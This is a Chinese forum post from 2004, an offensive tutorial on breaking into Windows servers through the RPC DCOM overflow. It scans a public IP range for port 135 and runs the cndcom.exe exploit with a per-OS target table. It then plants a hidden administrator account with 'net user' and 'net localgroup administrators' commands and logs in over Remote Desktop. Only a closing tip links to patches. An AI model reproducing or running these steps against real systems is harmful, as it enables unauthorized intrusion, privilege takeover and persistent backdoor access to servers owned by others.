|
利用RPC漏洞入侵服务器<br>
<br>
<br>微软基于WINNT内核的操作系统都存在一个RPC漏洞,这个漏洞太可怕了,是致命的漏洞,如果你不及时打RPC补丁包,就可能成为别人攻击的目标,他们通过向你发送畸形数据包,导致你的RPC服务进程崩溃,因为许多应用服务程序都依赖于它,就造成这些应用程序服务的拒绝服务,然后就可以通过135端口来提升权限或获得DCOM客户端认证的信息。是不是很可怕,很容易就可以获得管理员权限,控制你的服务器,下面,我们一起来看看入侵存在RPC服务漏洞的服务器的过程。<br>
<br>
<br>
一、准备工作<br>1、需要使用的黑客软件:cndcom.exe(包含一个DLL文件cygwin1.dll),它就是利用RPC溢出的入侵程序,针对几乎所有的WINDOWS版本。<br>2、端口扫描工具Superscan,用它扫描135端口的开放情况.<br>
<br>
<br>
二、技术分析<br>要想成功的入侵服务器,需要具备2个条件:1、服务器存在RPC漏洞 2、TCP协议的135端口要是开放状态<br><br>
<br>
三、入侵服务器<br>所有的工作都准备好了,那么我们开始吧!<br><br>1、使用Superscan扫描135端口<br>(图一)<br>①使用Superscan工具扫描“218.22.123.*”这个网段的情况。在IP栏“起始”和“结束”中分别输入“218.22.123.1”和“218.22.123.254”。<br>②指定扫描的端口为135端口。“所有的端口定义”为从”135“到”135“。<br>③显示扫描的结果,前面带”+“的都是135端口开放的服务器,这样我们就可以在这些服务器中寻找存在RPC漏洞的机器。<br>
<br>2、使用cndcom.exe入侵服务器<br>入侵服务器需要一定的耐心和运气,对上面扫描到的服务器一一试验,一定会找到存在RPC漏洞的机器。<br>
先拿218.22.123.26作为目标, 好了,试试我们的手气吧!<br>(图二)<br>①在命令提示符下输入”cndcom 17 218.22.123.26“,接着要耐心等待,看看我们的运气如何!<br>这里有必要把cndcom命令的使用情况说明一下:<br>cndcom <标记> <目标IP地址><br><br>标记是一系列数字,不同的操作系统,打了不同的补丁,它的标记都是不同的,它的对应情况如下:<br>0 Windows 2000 SP0 (英文版)<br>1 Windows 2000 SP1 (英文版)<br>2 Windows 2000 SP2 (英文版)<br>3 Windows 2000 SP3 (英文版)<br>4 Windows 2000 SP4 (英文版)<br>5 Windows XP SP0 (英文版)<br>6 Windows XP SP1 (英文版)<br>7 Windows NT SP5 (中文版)<br>8 Windows NT SP6 (中文版)<br>9 Windows NT SP6 (繁体中文版)<br>10 Windows 2000 SP0 (中文版)<br>11 Windows 2000 SP1 (中文版)<br>12 Windows 2000 SP2 (中文版)<br>13 Windows 2000 SP2 (中文版)<br>14 Windows 2000 SP3 (中文版)<br>15 Windows 2000 SP3 (繁体中文版)<br>16 Windows 2000 SP4 (中文版)<br>17 Windows 2000 SP4 (中文版)<br>18 Windows XP SP1 (中文版)<br>现在的服务器一般都采用WIN2000服务器版的操作系统,并打上SP4补丁,因此标记选择”17“入侵服务器的机率就比较大些。<br><br>②我们的手气不错啊!没想到第一次就中奖了。这时在命令提示符下显示"C:\WINNT\SYSTEM32\",我们已经成功的入侵了“218.22.123.26”服务器,从提示符的显示看,这是一台WIN2000服务器。<br>
<br>3、创建系统管理员帐号<br>虽然我们已经成功的入侵服务器,但在命令提示符下控制服务器很复杂,因此,使用NET命令来为自己创建一个管理员帐号。<br>(图三)<br>①在“218.22.123.26”服务器上为自己创建一个用户名为rtj,密码为“rrttjj"的帐号。<br>在”C:\WINNT\SYSTEM32\“提示符下输入”net user rtj rrttjj /add",然后系统提示“命令成功完成”,这样就创建了rtj帐号,如果你还不放心,使用"net user"命令查一下,看看rtj帐号是否存在。<br>②虽然创建了rtj帐号,但只是一般用户还没有管理员权限,因此要加入到管理员组中。<br>在”C:\WINNT\SYSTEM32\“提示符下输入“net localgroup administrators rtj /add",这样就提升“rtj”为系统系统管理员。<br>
<br>
四、远程登录服务器<br>管理员为了管理方便,经常开通终端服务器,用Superscan扫描3389端口是否开放,经扫描发现“218.22.123.26”的3389端口是开放的,下面我们就可以使用rtj帐号远程登录服务器。<br>运行终端服务器客户端软件,IP地址中输入“218.22.123.26”,单击“连接”按钮,然后输入“rtj帐号”的用户名和密码(图四),就可以登录到服务器了,这样一切尽在掌握了。<br>
<br>
小提示:<br>RPC补丁下载<br>
Windows NT 4.0 Server : <br><a target=_blank href=http://microsoft.com/downloads/details.aspx?FamilyId=2CC66F4E-217E-4FA7-BDBF-DF77A0B9303F&displaylang=en>http://microsoft.com/downloads/details.aspx?FamilyId=2CC66F4E-217E-4FA7-BDBF-DF77A0B9303F&displaylang=en</a> <br>
<br>
Windows 2000: <br><a target=_blank href=http://microsoft.com/downloads/details.aspx?FamilyId=C8B8A846-F541-4C15-8C9F-220354449117&displaylang=en>http://microsoft.com/downloads/details.aspx?FamilyId=C8B8A846-F541-4C15-8C9F-220354449117&displaylang=en</a> <br>
<br>
Windows XP : <br><a target=_blank href=http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylang=en>http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylang=en</a> <br>
<br>
Windows Server 2003 : <br><a target=_blank href=http://microsoft.com/downloads/details.aspx?FamilyId=F8E0FF3A-9F4C-4061-9009-3A212458E92E&displaylang=en>http://microsoft.com/downloads/details.aspx?FamilyId=F8E0FF3A-9F4C-4061-9009-3A212458E92E&displaylang=en</a> <br><br><br>
<br>
<br><br> |
狗仔卡
发表于 2004-2-3 12:07:55
收藏
分享
淘帖
支持
反对
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡